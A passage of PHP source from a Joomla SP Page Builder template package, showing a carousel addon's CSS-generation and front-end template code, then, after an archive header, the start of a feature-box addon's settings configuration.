			$output	.= '<a href="#sppb-carousel-'. $this->addon->id .'" class="sppb-carousel-arrow right sppb-carousel-control" data-slide="next"><i class="fa fa-angle-right"></i></a>';
		}
	
		$output .= '</div>';

		return $output;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';
		$css = '';

		// Buttons style
		foreach ($this->addon->settings->sp_carousel_item as $key => $value) {

			if(isset($value->button_text)) {
				$css_path = new JLayoutFile('addon.css.button', $layout_path);
				$css .= $css_path->render(array('addon_id' => $addon_id, 'options' => $value, 'id' => 'btn-' . ($this->addon->id + $key) ));
			}

			$title_css = '';
			$title_css .= (isset($value->title_fontsize) && $value->title_fontsize) ? 'font-size:' . $value->title_fontsize . 'px;' : '';
			$title_css .= (isset($value->title_lineheight) && $value->title_lineheight) ? 'line-height:' . $value->title_lineheight . 'px;' : '';
			$title_css .= (isset($value->title_color) && !empty($value->title_color)) ? 'color:' . $value->title_color . ';' : '';

			if(isset($value->title_font_family) && $value->title_font_family) {
				$font_path = new JLayoutFile('addon.css.fontfamily', $layout_path);
				$font_path->render(array('font'=>$value->title_font_family));
				$title_css .= 'font-family: ' . $value->title_font_family . ';';
			}

			if(isset($value->title_padding) && $value->title_padding) {
				if(trim($value->title_padding) != "") {
					$title_padding_md = '';
					$title_paddings_md = explode(' ', $value->title_padding);
					foreach($title_paddings_md as $padding_md) {
						if(empty(trim($padding_md))) {
							$title_padding_md .= ' 0';
						} else {
							$title_padding_md .= ' '.$padding_md;
						}
					}
					$title_css .= "padding: " . $title_padding_md . ";\n";
				}
			}

			if(isset($value->title_margin) && $value->title_margin){
				if(trim($value->title_margin) != "") {
					$title_margin_md = '';
					$title_margins_md = explode(' ', $value->title_margin);
					foreach($title_margins_md as $margin_md) {
						if(empty(trim($margin_md))) {
							$title_margin_md .= ' 0';
						} else {
							$title_margin_md .= ' '.$margin_md;
						}
					}
					$title_css .= "margin: " . $title_margin_md . ";\n";
				}
			}

			if(!empty($title_css)){
				$css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption h2 {';
					$css .= $title_css;
				$css .= '}';
			}

			$content_css = '';
			$content_css .= (isset($value->content_fontsize) && $value->content_fontsize) ? 'font-size:' . $value->content_fontsize . 'px;' : '';
			$content_css .= (isset($value->content_lineheight) && $value->content_lineheight) ? 'line-height:' . $value->content_lineheight . 'px;' : '';
			$content_css .= (isset($value->content_color) && $value->content_color) ? 'color:' . $value->content_color . ';' : '';

			if(isset($value->content_font_family) && $value->content_font_family) {
				$font_path = new JLayoutFile('addon.css.fontfamily', $layout_path);
				$font_path->render(array('font'=>$value->content_font_family));
				$content_css .= 'font-family: ' . $value->content_font_family . ';';
			}

			if(isset($value->content_padding) && $value->content_padding){
				if(trim($value->content_padding) != ""){
					$content_padding_md = '';
					$content_paddings_md = explode(' ', $value->content_padding);
					foreach($content_paddings_md as $padding_md){
						if(empty(trim($padding_md))){
							$content_padding_md .= ' 0';
						} else {
							$content_padding_md .= ' '.$padding_md;
						}

					}
					$content_css .= "padding: " . $content_padding_md . ";\n";
				}
			}

			if(isset($value->content_margin) && $value->content_margin){
				if(trim($value->content_margin) != ""){
					$content_margin_md = '';
					$content_margins_md = explode(' ', $value->content_margin);
					foreach($content_margins_md as $margin_md){
						if(empty(trim($margin_md))){
							$content_margin_md .= ' 0';
						} else {
							$content_margin_md .= ' ' . $margin_md;
						}

					}
					$content_css .= "margin: " . $content_margin_md . ";\n";
				}
			}

			if(!empty($content_css)){
				$css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption .sppb-carousel-content{';
					$css .= $content_css;
				$css .= '}';
			}

			$selector_css = new JLayoutFile('addon.css.selector', $layout_path);
			$css .= $selector_css->render(
				array(
					'options'=>$value,
					'addon_id'=>$addon_id,
					'selector'=>'#sppb-item-' . ($this->addon->id . $key)
				)
			);

			// Tablet CSS
			$tablet_css = '';
			$title_css = '';
			$title_css .= (isset($value->title_fontsize_sm) && $value->title_fontsize_sm) ? 'font-size:' . $value->title_fontsize_sm . 'px;' : '';
			$title_css .= (isset($value->title_lineheight_sm) && $value->title_lineheight_sm) ? 'line-height:' . $value->title_lineheight_sm . 'px;' : '';

			if(isset($value->title_padding_sm) && $value->title_padding_sm){
				if(trim($value->title_padding_sm) != "") {
					$title_padding_sm = '';
					$title_paddings_sm = explode(' ', $value->title_padding_sm);
					foreach($title_paddings_sm as $padding_sm){
						if(empty(trim($padding_sm))){
							$title_padding_sm .= ' 0';
						} else {
							$title_padding_sm .= ' '.$padding_sm;
						}
					}
					$title_css .= "padding: " . $title_padding_sm . ";\n";
				}
			}

			if(isset($value->title_padding_sm) && $value->title_margin_sm){
				if(trim($value->title_margin_sm) != "") {
					$title_margin_sm = '';
					$title_margins_sm = explode(' ', $value->title_margin_sm);
					foreach($title_margins_sm as $margin_sm){
						if(empty(trim($margin_sm))){
							$title_margin_sm .= ' 0';
						} else {
							$title_margin_sm .= ' '.$margin_sm;
						}
					}
					$title_css .= "margin: " . $title_margin_sm . ";\n";
				}
			}

			if(!empty($title_css)){
				$tablet_css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption h2 {';
				$tablet_css .= $title_css;
				$tablet_css .= '}';
			}

			$content_css = '';
			$content_css .= (isset($value->content_fontsize_sm) && $value->content_fontsize_sm) ? 'font-size:' . $value->content_fontsize_sm . 'px;' : '';
			$content_css .= (isset($value->content_lineheight_sm) && $value->content_lineheight_sm) ? 'line-height:' . $value->content_lineheight_sm . 'px;' : '';

			if(isset($value->content_padding_sm) && $value->content_padding_sm){
				if(trim($value->content_padding_sm) != ""){
					$content_padding_sm = '';
					$content_paddings_sm = explode(' ', $value->content_padding_sm);
					foreach($content_paddings_sm as $padding_sm){
						if(empty(trim($padding_sm))){
							$content_padding_sm .= ' 0';
						} else {
							$content_padding_sm .= ' '.$padding_sm;
						}
					}
					$content_css .= "padding: " . $content_padding_sm . ";\n";
				}
			}

			if(isset($value->content_margin_sm) && $value->content_margin_sm){
				if(trim($value->content_margin_sm) != ""){
					$content_margin_sm = '';
					$content_margins_sm = explode(' ', $value->content_margin_sm);
					foreach($content_margins_sm as $margin_sm){
						if(empty(trim($margin_sm))){
							$content_margin_sm .= ' 0';
						} else {
							$content_margin_sm .= ' '.$margin_sm;
						}
					}
					$content_css .= "margin: " . $content_margin_sm . ";\n";
				}
			}

			if(!empty($content_css)){
				$tablet_css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption .sppb-carousel-content{';
					$tablet_css .= $content_css;
				$tablet_css .= '}';
			}

			if(!empty($tablet_css)){
				$css .= '@media (min-width: 768px) and (max-width: 991px) {';
					$css .= $tablet_css;
				$css .= '}';
			}

			// Mobile CSS
			$mobile_css = '';
			$title_css = '';
			$title_css .= (isset($value->title_fontsize_xs) && $value->title_fontsize_xs) ? 'font-size:' . $value->title_fontsize_xs . 'px;' : '';
			$title_css .= (isset($value->title_lineheight_xs) && $value->title_lineheight_xs) ? 'line-height:' . $value->title_lineheight_xs . 'px;' : '';

			if(isset($value->title_padding_xs) && $value->title_padding_xs){
				if(trim($value->title_padding_xs) != "") {
					$title_padding_xs = '';
					$title_paddings_xs = explode(' ', $value->title_padding_xs);
					foreach($title_paddings_xs as $padding_xs){
						if(empty(trim($padding_xs))) {
							$title_padding_xs .= ' 0';
						} else {
							$title_padding_xs .= ' '.$padding_xs;
						}
					}
					$title_css .= "padding: " . $title_padding_xs . ";\n";
				}
			}

			if(isset($value->title_margin_xs) && $value->title_margin_xs){
				if(trim($value->title_margin_xs) != ""){
					$title_margin_xs = '';
					$title_margins_xs = explode(' ', $value->title_margin_xs);
					foreach($title_margins_xs as $margin_xs){
						if(empty(trim($margin_xs))){
							$title_margin_xs .= ' 0';
						} else {
							$title_margin_xs .= ' '.$margin_xs;
						}
					}
					$title_css .= "margin: " . $title_margin_xs . ";\n";
				}
			}

			if(!empty($title_css)){
				$mobile_css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption h2{';
					$mobile_css .= $title_css;
				$mobile_css .= '}';
			}

			$content_css = '';
			$content_css .= (isset($value->content_fontsize_xs) && $value->content_fontsize_xs) ? 'font-size:' . $value->content_fontsize_xs . 'px;' : '';
			$content_css .= (isset($value->content_lineheight_xs) && $value->content_lineheight_xs) ? 'line-height:' . $value->content_lineheight_xs . 'px;' : '';

			if(isset($value->content_padding_xs) && $value->content_padding_xs){
				if(trim($value->content_padding_xs) != ""){
					$content_padding_xs = '';
					$content_paddings_xs = explode(' ', $value->content_padding_xs);
					foreach($content_paddings_xs as $padding_xs){
						if(empty(trim($padding_xs))){
							$content_padding_xs .= ' 0';
						} else {
							$content_padding_xs .= ' '.$padding_xs;
						}
					}
					$content_css .= "padding: " . $content_padding_xs . ";\n";
				}
			}

			if(isset($value->content_margin_xs) && $value->content_margin_xs){
				if(trim($value->content_margin_xs) != ""){
					$content_margin_xs = '';
					$content_margins_xs = explode(' ', $value->content_margin_xs);
					foreach($content_margins_xs as $margin_xs){
						if(empty(trim($margin_xs))){
							$content_margin_xs .= ' 0';
						} else {
							$content_margin_xs .= ' '.$margin_xs;
						}
					}
					$content_css .= "margin: " . $content_margin_xs . ";\n";
				}
			}

			if(!empty($content_css)){
				$mobile_css .= $addon_id . ' .sppb-item-' . $this->addon->id . $key . ' .sppb-carousel-caption .sppb-carousel-content{';
					$mobile_css .= $content_css;
				$mobile_css .= '}';
			}

			if(!empty($mobile_css)){
				$css .= '@media (max-width: 767px) {';
					$css .= $mobile_css;
				$css .= '}';
			}
		}

		$speed = (isset($this->addon->settings->speed) && $this->addon->settings->speed) ? $this->addon->settings->speed : 600;

		$css .= $addon_id.' .sppb-carousel-inner > .sppb-item{-webkit-transition-duration: '.$speed.'ms; transition-duration: '.$speed.'ms;}';

		return $css;
	}

	public static function getTemplate(){
		$output = '
		<#
		var interval = data.interval ? parseInt(data.interval) * 1000 : 5000;
		if(data.autoplay==0){
			interval = "false";
		}
		var autoplay = data.autoplay ? \'data-sppb-ride="sppb-carousel"\' : "";
		#>
		<style type="text/css">
			#sppb-addon-{{ data.id }} .sppb-carousel-inner > .sppb-item{
				-webkit-transition-duration: {{ data.speed }}ms;
				transition-duration: {{ data.speed }}ms;
			}
			<# _.each(data.sp_carousel_item, function (carousel_item, key){ #>
				<# var button_fontstyle = carousel_item.button_fontstyle || ""; #>
				#sppb-addon-{{ data.id }} #btn-{{ data.id + "" + key }}.sppb-btn-{{ carousel_item.type }}{
					letter-spacing: {{ carousel_item.button_letterspace }};
					<# if(_.isArray(button_fontstyle)) { #>
						<# if(button_fontstyle.indexOf("underline") !== -1){ #>
							text-decoration: underline;
						<# } #>
						<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
							text-transform: uppercase;
						<# } #>
						<# if(button_fontstyle.indexOf("italic") !== -1){ #>
							font-style: italic;
						<# } #>
						<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
							font-weight: lighter;
						<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
							font-weight: normal;
						<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
							font-weight: bold;
						<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
							font-weight: bolder;
						<# } #>
					<# } #>
				}

				<# if(carousel_item.button_type == "custom"){ #>
					#sppb-addon-{{ data.id }} #btn-{{ data.id + "" + key }}.sppb-btn-custom{
						color: {{ carousel_item.button_color }};
						<# if(carousel_item.button_appearance == "outline"){ #>
							border-color: {{ carousel_item.button_background_color }}
						<# } else if(carousel_item.button_appearance == "3d"){ #>
							border-bottom-color: {{ carousel_item.button_background_color_hover }};
							background-color: {{ carousel_item.button_background_color }};
						<# } else if(carousel_item.button_appearance == "gradient"){ #>
							border: none;
							<# if(typeof carousel_item.button_background_gradient.type !== "undefined" && carousel_item.button_background_gradient.type == "radial"){ #>
								background-image: radial-gradient(at {{ carousel_item.button_background_gradient.radialPos || "center center"}}, {{ carousel_item.button_background_gradient.color }} {{ carousel_item.button_background_gradient.pos || 0 }}%, {{ carousel_item.button_background_gradient.color2 }} {{ carousel_item.button_background_gradient.pos2 || 100 }}%);
							<# } else { #>
								background-image: linear-gradient({{ carousel_item.button_background_gradient.deg || 0}}deg, {{ carousel_item.button_background_gradient.color }} {{ carousel_item.button_background_gradient.pos || 0 }}%, {{ carousel_item.button_background_gradient.color2 }} {{ carousel_item.button_background_gradient.pos2 || 100 }}%);
							<# } #>
						<# } else { #>
							background-color: {{ carousel_item.button_background_color }};
						<# } #>
					}

					#sppb-addon-{{ data.id }} #btn-{{ data.id + "" + key }}.sppb-btn-custom:hover{
						color: {{ carousel_item.button_color_hover }};
						background-color: {{ carousel_item.button_background_color_hover }};
						<# if(carousel_item.button_appearance == "outline"){ #>
							border-color: {{ carousel_item.button_background_color_hover }};
						<# } else if(carousel_item.button_appearance == "gradient"){ #>
							<# if(typeof carousel_item.button_background_gradient_hover.type !== "undefined" && carousel_item.button_background_gradient_hover.type == "radial"){ #>
								background-image: radial-gradient(at {{ carousel_item.button_background_gradient_hover.radialPos || "center center"}}, {{ carousel_item.button_background_gradient_hover.color }} {{ carousel_item.button_background_gradient_hover.pos || 0 }}%, {{ carousel_item.button_background_gradient_hover.color2 }} {{ carousel_item.button_background_gradient_hover.pos2 || 100 }}%);
							<# } else { #>
								background-image: linear-gradient({{ carousel_item.button_background_gradient_hover.deg || 0}}deg, {{ carousel_item.button_background_gradient_hover.color }} {{ carousel_item.button_background_gradient_hover.pos || 0 }}%, {{ carousel_item.button_background_gradient_hover.color2 }} {{ carousel_item.button_background_gradient_hover.pos2 || 100 }}%);
							<# } #>
						<# } #>
					}

				<# } #>
				<#
					var padding = "";
					var padding_sm = "";
					var padding_xs = "";
					if(carousel_item.title_padding){
						if(_.isObject(carousel_item.title_padding)){
							if(carousel_item.title_padding.md.trim() !== ""){
								padding = carousel_item.title_padding.md.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.title_padding.sm.trim() !== ""){
								padding_sm = carousel_item.title_padding.sm.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.title_padding.xs.trim() !== ""){
								padding_xs = carousel_item.title_padding.xs.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}
						}

					}

					var margin = "";
					var margin_sm = "";
					var margin_xs = "";
					if(carousel_item.title_margin){
						if(_.isObject(carousel_item.title_margin)){
							if(carousel_item.title_margin.md.trim() !== ""){
								margin = carousel_item.title_margin.md.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.title_margin.sm.trim() !== ""){
								margin_sm = carousel_item.title_margin.sm.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.title_margin.xs.trim() !== ""){
								margin_xs = carousel_item.title_margin.xs.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}
						}

					}


					var content_padding = "";
					var content_padding_sm = "";
					var content_padding_xs = "";
					if(carousel_item.content_padding){
						if(_.isObject(carousel_item.content_padding)){
							if(carousel_item.content_padding.md.trim() !== ""){
								content_padding = carousel_item.content_padding.md.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.content_padding.sm.trim() !== ""){
								content_padding_sm = carousel_item.content_padding.sm.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.content_padding.xs.trim() !== ""){
								content_padding_xs = carousel_item.content_padding.xs.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}
						}

					}

					var content_margin = "";
					var content_margin_sm = "";
					var content_margin_xs = "";
					if(carousel_item.content_margin){
						if(_.isObject(carousel_item.content_margin)){
							if(carousel_item.content_margin.md.trim() !== ""){
								content_margin = carousel_item.content_margin.md.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.content_margin.sm.trim() !== ""){
								content_margin_sm = carousel_item.content_margin.sm.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}

							if(carousel_item.content_margin.xs.trim() !== ""){
								content_margin_xs = carousel_item.content_margin.xs.split(" ").map(item => {
									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}
						}

					}
				#>

				#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption h2{
					<# if(_.isObject(carousel_item.title_fontsize)){ #>
						font-size: {{ carousel_item.title_fontsize.md }}px;
					<# } else { #>
						font-size: {{ carousel_item.title_fontsize }}px;
					<# } #>
					<# if(_.isObject(carousel_item.title_lineheight)){ #>
						line-height: {{ carousel_item.title_lineheight.md }}px;
					<# } else { #>
						line-height: {{ carousel_item.title_lineheight }}px;
					<# } #>
					color: {{ carousel_item.title_color }};
					padding: {{ padding }};
					margin: {{ margin }};
				}
				#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption .sppb-carousel-content{
					<# if(_.isObject(carousel_item.content_fontsize)){ #>
						font-size: {{ carousel_item.content_fontsize.md }}px;
					<# } else { #>
						font-size: {{ carousel_item.content_fontsize }}px;
					<# } #>
					<# if(_.isObject(carousel_item.content_lineheight)){ #>
						line-height: {{ carousel_item.content_lineheight.md }}px;
					<# } else { #>
						line-height: {{ carousel_item.content_lineheight }}px;
					<# } #>
					color: {{ carousel_item.content_color }};
					padding: {{ content_padding }};
					margin: {{ content_margin }};
				}
				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption h2{
						<# if(_.isObject(carousel_item.title_fontsize)){ #>
							font-size: {{ carousel_item.title_fontsize.sm }}px;
						<# } #>
						<# if(_.isObject(carousel_item.title_lineheight)){ #>
							line-height: {{ carousel_item.title_lineheight.sm }}px;
						<# } #>
						padding: {{ padding_sm }};
						margin: {{ margin_sm }};
					}
					#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption .sppb-carousel-content{
						<# if(_.isObject(carousel_item.content_fontsize)){ #>
							font-size: {{ carousel_item.content_fontsize.sm }}px;
						<# } #>
						<# if(_.isObject(carousel_item.content_lineheight)){ #>
							line-height: {{ carousel_item.content_lineheight.sm }}px;
						<# } #>
						padding: {{ content_padding_sm }};
						margin: {{ content_margin_sm }};
					}
				}

				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption h2{
						<# if(_.isObject(carousel_item.title_fontsize)){ #>
							font-size: {{ carousel_item.title_fontsize.xs }}px;
						<# } #>
						<# if(_.isObject(carousel_item.title_lineheight)){ #>
							line-height: {{ carousel_item.title_lineheight.xs }}px;
						<# } #>
						padding: {{ padding_xs }};
						margin: {{ margin_xs }};
					}
					#sppb-addon-{{ data.id }} .sppb-item-{{ data.id }}{{ key }} .sppb-carousel-caption .sppb-carousel-content{
						<# if(_.isObject(carousel_item.content_fontsize)){ #>
							font-size: {{ carousel_item.content_fontsize.xs }}px;
						<# } #>
						<# if(_.isObject(carousel_item.content_lineheight)){ #>
							line-height: {{ carousel_item.content_lineheight.xs }}px;
						<# } #>
						padding: {{ content_padding_xs }};
						margin: {{ content_margin_xs }};
					}
				}
			<# }); #>
		</style>
		<div class="sppb-carousel sppb-slide {{ data.class }}" id="sppb-carousel-{{ data.id }}" data-interval="{{ interval }}" {{{ autoplay }}}>
			<# if(data.controllers){ #>
				<ol class="sppb-carousel-indicators">
				<# _.each(data.sp_carousel_item, function (carousel_item, key){ #>
					<# var active = (key == 0) ? "active" : ""; #>
					<li data-sppb-target="#sppb-carousel-{{ data.id }}"  class="{{ active }}"  data-sppb-slide-to="{{ key }}"></li>
				<# }); #>
				</ol>
			<# } #>
			<div class="sppb-carousel-inner {{ data.alignment }}">
				<#
				_.each(data.sp_carousel_item, function (carousel_item, key){
					var carouselBg = {}
					if (typeof carousel_item.bg !== "undefined" && typeof carousel_item.bg.src !== "undefined") {
						carouselBg = carousel_item.bg
					} else {
						carouselBg = {src: carousel_item.bg}
					}
					var classNames = (key == 0) ? "active" : "";
					classNames += carouselBg.src ? " sppb-item-has-bg" : "";
					classNames += " sppb-item-"+data.id+""+key;
				#>
					<div class="sppb-item {{ classNames }}">
						<# if(carouselBg.src && carouselBg.src.indexOf("http://") == -1 && carouselBg.src.indexOf("https://") == -1){ #>
							<img src=\'{{ pagebuilder_base + carouselBg.src }}\' alt="{{ carousel_item.title }}">
						<# } else if(carouselBg.src){ #>
							<img src=\'{{ carouselBg.src }}\' alt="{{ carousel_item.title }}">
						<# } #>
						<div class="sppb-carousel-item-inner">
							<div class="sppb-carousel-caption">
								<div class="sppb-carousel-text">
									<# if(carousel_item.title || carousel_item.content) { #>
										<# if(carousel_item.title) { #>
											<h2 class="sp-editable-content" id="addon-title-{{data.id}}-{{key}}" data-id={{data.id}} data-fieldName="sp_carousel_item-{{key}}-title">{{ carousel_item.title }}</h2>
										<# } #>
										<div class="sppb-carousel-content sp-editable-content" id="addon-content-{{data.id}}-{{key}}" data-id={{data.id}} data-fieldName="sp_carousel_item-{{key}}-content">{{{ carousel_item.content }}}</div>
										<# if(carousel_item.button_text) { #>
											<#
												var btnClass = "";
												btnClass += carousel_item.button_type ? " sppb-btn-"+carousel_item.button_type : " sppb-btn-default" ;
												btnClass += carousel_item.button_size ? " sppb-btn-"+carousel_item.button_size : "" ;
												btnClass += carousel_item.button_shape ? " sppb-btn-"+carousel_item.button_shape : " sppb-btn-rounded" ;
												btnClass += carousel_item.button_appearance ? " sppb-btn-"+carousel_item.button_appearance : "" ;
												btnClass += carousel_item.button_block ? " "+carousel_item.button_block : "" ;
												var button_text = carousel_item.button_text;

												let icon_arr = (typeof carousel_item.button_icon !== "undefined" && carousel_item.button_icon) ? carousel_item.button_icon.split(" ") : "";
												let icon_name = icon_arr.length === 1 ? "fa "+carousel_item.button_icon : carousel_item.button_icon;

												if(carousel_item.button_icon_position == "left"){
													button_text = (carousel_item.button_icon) ? \'<i class="\'+icon_name+\'"></i> \'+carousel_item.button_text : carousel_item.button_text ;
												}else{
													button_text = (carousel_item.button_icon) ? carousel_item.button_text+\' <i class="\'+icon_name+\'"></i>\' : carousel_item.button_text ;
												}
											#>
											<a href=\'{{ carousel_item.button_url }}\' target="{{ carousel_item.button_target }}" id="btn-{{ data.id + "" + key}}" class="sppb-btn{{ btnClass }}">{{{ button_text }}}</a>
										<# } #>
									<# } #>
								</div>
							</div>
						</div>
					</div>
				<# }); #>
			</div>
			<# if(data.arrows) { #>
				<a href="#sppb-carousel-{{ data.id }}" class="sppb-carousel-arrow left sppb-carousel-control" data-slide="prev"><i class="fa fa-chevron-left"></i></a>
				<a href="#sppb-carousel-{{ data.id }}" class="sppb-carousel-arrow right sppb-carousel-control" data-slide="next"><i class="fa fa-chevron-right"></i></a>
			<# } #>
		</div>
		';

		return $output;
	}
}PK!����c�c+flex/sppagebuilder/addons/feature/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_feature',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  'Feature Box'
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					)
				),

				'title_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_ICON_IMAGE_POSITION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_ICON_IMAGE_POSITION_DESC'),
					'values'=>array(
						'after'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_TITLE_POSITION_BEFORE_TITLE'),
						'before'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_TITLE_POSITION_AFTER_TITLE'),
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'after',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>array('md'=>16),
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>array('md'=>22),
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'std'=>'#4A4A4A',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_url'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_TITLE_IMAGE_URL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_TITLE_IMAGE_URL_DESC'),
					'placeholder'=>'http://',
					'hide_preview'=>true,
					'std'=>'',
				),

				'link_open_new_window' => array(
					'type' => 'checkbox',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_LINK_NEW_WINDOW'),
					'std' => 0,
					'depends'=>array(array('title_url', '!=', '')),
				),

				'url_appear'=>array(
